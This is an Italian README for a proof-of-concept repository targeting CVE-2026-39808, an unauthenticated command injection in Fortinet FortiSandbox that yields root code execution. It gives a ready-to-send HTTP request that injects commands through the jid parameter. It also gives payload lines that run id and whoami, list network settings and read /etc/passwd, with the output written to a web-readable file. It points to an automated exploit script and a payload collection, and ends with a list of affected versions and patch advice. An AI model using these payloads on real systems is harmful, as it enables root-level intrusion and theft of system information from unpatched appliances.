
CVE-2026-39808
Questo repository contiene una Proof of Concept pulita e ben documentata per CVE-2026-39808 — una vulnerabilità critica di command injection non autenticata in Fortinet FortiSandbox che consente la fuga dalla sandbox e l'esecuzione remota di codice come root (uid=0).
jid
Exploit riuscito che mostra uid=0 gid=0 groups=0
| Intervallo di versioni | Stato |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Vulnerabile |
| FortiSandbox 5.0.0 – 5.0.5 | Vulnerabile |
| 4.4.9+ / 5.0.6+ | Patchata |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Apri nel browser:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Exploit Python automatizzatoburp-request.txt → Richiesta Burp Suite pronta all'usopayloads.md → Raccolta di payload utiliscreenshots/ → Immagini dello sfruttamento passo-passoREADME.md → Questo fileAggiorna immediatamente FortiSandbox a una delle seguenti versioni:
Fortinet ha rilasciato patch ufficiali che risolvono questa vulnerabilità.
Realizzato per scopi di Ricerca & Apprendimento
⭐ Lascia una stella a questo repository se ti è stato utile!